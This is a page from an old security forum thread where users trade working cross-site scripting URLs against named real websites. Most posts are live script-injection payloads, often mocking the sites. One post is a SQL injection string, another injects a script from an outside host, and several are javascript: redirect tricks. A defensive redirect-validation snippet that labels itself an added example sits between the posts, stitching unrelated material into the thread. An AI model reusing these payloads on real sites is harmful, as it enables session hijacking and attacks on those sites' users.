sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 43 of 65
Re: So it begins
Date: March 26, 2007 04:14PM

http://elreg.regaccount.com/register/?product=theregister_newsletter&text_only=1&name=&email=&password=%3Czzz%3E&confirm_password=%3Czzz%3E&country=us&job_function=&other_job_function=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&job_sector=&other_job_sector=&employee_count=&it_spending=&submit=Sign+Up
http://www.theonion.com/content/search/onion/advanced?search=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&restrict=.site:onion

Re: So it begins
Posted by: Secks
Date: March 26, 2007 05:54PM

Nice one cryptic.

ht tp://www.ufc.com/index.cfm?fa=search.results&ss=<script>alert('Chuck Liddel')</script>

www.aim.com/help_faq/error_mess/winerrors_buddylist.adp?aolp=%22%3E%3Cscript%3Ealert('Aim')%3C/script%3E

The aim one comes up multiple times.



Edited 3 time(s). Last edit at 03/26/2007 05:57PM by Secks.

Re: So it begins
Posted by: kirke
Date: March 27, 2007 08:25AM

aim.com and aol.com (see http://sla.ckers.org/forum/read.php?3,44,page=42#msg-8824 )
I guess we can open an AOL/AIM thread

Re: So it begins
Date: March 28, 2007 01:56AM

http://www.filmsandtv.com/wml/searchmovies.wml?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Most people don't realize mobile sites that are meant to be browsed by mobile devices can still be vulnerable to attacks.

Re: So it begins
Posted by: beford
Date: March 28, 2007 05:00PM

XSS: http://moviles.es.msn.com/error.php?error=11&returnurl=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

SQL: http://aic.latino.msn.com/2002autosuite/clients/msnlatino/MMT.asp?as3_languagecode=18&navigation=gray&as3_make=AUDI');SQL+pwnage



Edited 1 time(s). Last edit at 03/28/2007 05:29PM by beford.

Re: So it begins
Posted by: kefka
Date: March 28, 2007 10:00PM

http://help.mapquest.com/jive/kbsearch.jspa?forceEmptySearch=true&advanced=false&childCatID=0&rankBy=10001&parentCatID=1&searchQuery=%22%3E%3Cscript%3Ealert%28%22kefka+owns+mapquest%22%29%3C%2Fscript%3E%3C%2F
http://search.about.com/fullsearch.htm?TopNode=%2F&terms=%22%3E%3Cscript%3Ealert%28%22kefka+owns+about.com%22%29%3C%2Fscript%3E%3C%2F&x=36&y=9
http://custom.marketwatch.com/custom/earthlink-net/quote-news.asp?symb=%22%3E%3Cscript%3Ealert(%22kefka%20owns%20marketwatch.com%22)%3C/script%3E%3C/&osymb=%22%3E%3Cscript%3Ealert(%22kefka%20owns%20marketwatch.com%22)%3C/script%3E%3C/&sid=&time=&freq=&compidx=&comp=&ma=&uf=&lf=&type=&destination=2 pops a few times
http://kb.earthlink.net/main.asp?add=1&vars=s,mode,catID,catTitle,perpage,unsupported,currentPage,exactID,query&s=init&mode=Query&catID=earthlink_KT&catTitle=All%20Categories&perpage=10&unsupported=0&currentPage=0&exactID=&query=%3CSCRIPT/XSS%20SRC=%22http://ha.ckers.org/xss.js%22%3E%3C/SCRIPT%3E did not exit this cleanly

A top 500 thread wouldn't be a bad idea, might get some publicity too.



Edited 4 time(s). Last edit at 03/28/2007 10:25PM by kefka.

Re: So it begins
Posted by: tx
Date: March 29, 2007 09:39PM

http://www.hackerwatch.org/library/?doc=..&page=%3Cscript%3Ealert('xss');%3C/script%3E

-tx @ lowtech-labs.org

Re: So it begins
Date: March 29, 2007 11:48PM

tx Wrote:
-------------------------------------------------------
> http://www.hackerwatch.org/library/?doc=..&page=%3Cscript%3Ealert('xss');%3C/script%3E

I LOLed hard.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Date: March 30, 2007 01:41PM

https://www.scanalert.com/SignUp.sa?act=step1&oc=%27%29return+0%3B%7Dalert%280%29%3Bfunction+blah%28%29%7Bif+%280%29%7B%2F%2F

Hackersafe?

Re: So it begins
Posted by: hackathology
Date: March 31, 2007 03:20AM

Wow!!! I am always late, which I dunno why. But wow, XSS all the famous sites. That is so cool...

http://hackathology.blogspot.com

Re: So it begins
Date: March 31, 2007 11:33PM

http://www.ip2state.com/map.asp?s=ip&city=<script>alert('LAWL');</script>&lat=60.0629&long=-32.1209&ses=947208921


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: Anonymous User
Date: April 01, 2007 07:13AM

From the series "The power of XSS and April 1st fool's day":

http://www.securitylab.ru/news/extra/293608.php

Re: So it begins
Posted by: malorn
Date: April 01, 2007 05:25PM

Decided to sift through Alexa's Top and here are some:

http://busca.uol.com.br/www/index.html?ref=homeuol&q=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E&x=0&y=0

http://szukaj.onet.pl/zdjecia.html?qt=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&col=all&st=1&s=1

http://search.rediff.com/imgsrch/default.php?MT_OLD=hello&MT=%3Cscript%3Ealert(1)%3C/script%3E



Edited 1 time(s). Last edit at 04/01/2007 05:29PM by malorn.

Re: So it begins
Date: April 01, 2007 06:35PM

Awesome AnDrEw Wrote:
-------------------------------------------------------
> http://www.ip2state.com/map.asp?s=ip&city=alert('LAWL');&lat=60.0629&long=-32.1209&ses=947208921


Glad you found a use for that URL =oP

Re: So it begins
Date: April 02, 2007 03:10AM

Unfortunately there wasn't a lot to work with on that site.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: digi7al64
Date: April 03, 2007 02:01AM

http://portal.spidynamics.com/utility/Redirect.aspx?U=javascript:alert(%22xss%22)

It never ceases to amaze how many sites have problems shutting down 302s.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Date: April 03, 2007 03:24AM

I've been on a real roll tonight with XSS vulnerabilities on television News sites. There must be some great conspiracy brewing, because it seems like virtually all "ABC7" news sites are vulnerable. I'm only posting 2 here, but if you search Google you'll find a shitload of them, and all of them have problems.

http://search.abclocal.go.com/search/search?station=kabc&search=siteSearch&q=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

http://dynamic.allbrittontv.com/mainsearch.hrb?s=wjla&string=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Date: April 03, 2007 03:34AM

Two of my favorite television channels.

http://www.aetv.com/search/global.do?keywords="><script>alert("Why%20is%20there%20no%20pornography%20on%20the%20Arts%20and%20Entertainment%20channel?");</script><!--

http://www.history.com/search.do?searchText="><script>alert("Protip:%20Germany%20loses%20the%20war.");</script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: kirke
Date: April 03, 2007 04:36AM

digi7al64, did spi fix it (partially), or did you only test with FF?
Anyway, it's still subject for the "Redirect Edition"
http://portal.spidynamics.com/utility/Redirect.aspx?U=http://ha.ckers.org/images/stallowned.jpg

Re: So it begins
Posted by: digi7al64
Date: April 03, 2007 07:50AM

Sorry, the forum dropped the ); on the end

And yes I only tested in Firefox... oops
http://portal.spidynamics.com/utility/Redirect.aspx?U=javascript:alert(%22xss%22%29;

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

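A defensive counterpart to the `Redirect.aspx?U=` reports in the posts above, as an added example that is not part of any post or of the affected site's code: a server-side check that refuses both the `javascript:` target and the off-site target before a 302 is issued. The host allowlist, base origin and fallback path are assumptions made up for the illustration.

```javascript
// Added example: validate a redirect target (such as the U parameter)
// before sending a Location header. All names below are hypothetical.
const ALLOWED_HOSTS = new Set(["portal.example.test"]); // assumed own host(s)
const BASE = "https://portal.example.test/";             // assumed own origin
const FALLBACK = "/";                                    // safe default target

function safeRedirectTarget(raw) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 2048) {
    return FALLBACK;
  }
  // Browsers strip tabs/newlines inside URLs and treat "\" like "/" for
  // http(s), so "java\tscript:" or "\\host" can slip past naive prefix
  // checks. Refuse control characters and backslashes outright.
  if (/[\u0000-\u001f\u007f\\]/.test(raw)) return FALLBACK;

  let url;
  try {
    // Resolving against our own origin lets relative paths through and
    // exposes protocol-relative targets ("//other.host/") as absolute ones.
    url = new URL(raw, BASE);
  } catch {
    return FALLBACK;
  }

  // Scheme allowlist: rejects javascript:, data:, vbscript:, etc.
  if (url.protocol !== "https:" && url.protocol !== "http:") return FALLBACK;
  // Host allowlist: rejects off-site redirects, including user@host tricks,
  // because hostname is taken from the parsed URL, not from the raw string.
  if (!ALLOWED_HOSTS.has(url.hostname)) return FALLBACK;
  if (url.username !== "" || url.password !== "") return FALLBACK;

  // Emit an origin-relative location so the response can never leave the site.
  return url.pathname + url.search + url.hash;
}
```

The value returned is what goes into the `Location` header; anything that fails a check falls back to the site root instead of being echoed.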
Re: So it begins
Date: April 04, 2007 02:40AM

http://sfbay.craigslist.org/search/sss?query="><script>alert(1);</script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Date: April 04, 2007 03:44AM

America's Most Wanted
http://www.amw.com/login/sign_up1.cfm?email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: digi7al64
Date: April 04, 2007 05:40AM

NOTE: Can you please search before posting. Recently I have seen the same stuff coming up.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: Anonymous User
Date: April 04, 2007 06:37AM

Maybe it would also make sense to post a PoC which works with an inclusion - an alert proves nothing.

What do you think?

Re: So it begins
Date: April 04, 2007 07:47AM

Sorry, I don't search the thread prior to posting, because it's over 40 pages long so I apologize if I expose an already disclosed vulnerability.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: Anonymous User
Date: April 04, 2007 11:27AM

@Awesome AnDrEw: I agree - what about thinking about a new way to collect found issues like a trac or sth like that?

Re: So it begins
Date: April 04, 2007 11:43AM

What you can do temporarily is do a search in the FD forum with exact match and search for whatever.com; then you can roughly see what posts to this topic have had that domain XSSed and see if it's the same.

Re: So it begins
Date: April 04, 2007 08:43PM

I generally just try finding vulnerabilities in sites I somehow visited, or if my girlfriend visited and I saw a potential hole. As for the proof of concept, generally the alert is enough to see whether characters are escaped, and if so in most cases String.fromCharCode works fine. Lately I've been using this file of a script I edited a little (someone posted it on an anonymous forum once, and I understand how it works, but I'm unfamiliar with a lot of JavaScript syntax): http://www.awesomeandrew.net/fd/xss.js


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: BlahBlah
Date: April 05, 2007 04:36AM

Rather pointless, but it's the first one I've found: http://www.take2theweb.com/_tools/popup.html?http://www.google.co.uk/intl/en_uk/images/logo.gif'onload=alert('XSS');'

Re: So it begins
Posted by: christ1an
Date: April 05, 2007 12:49PM

Three XSS holes on youtube:
http://christ1an.blogspot.com/2007/04/youtube-has-added-some-features.html
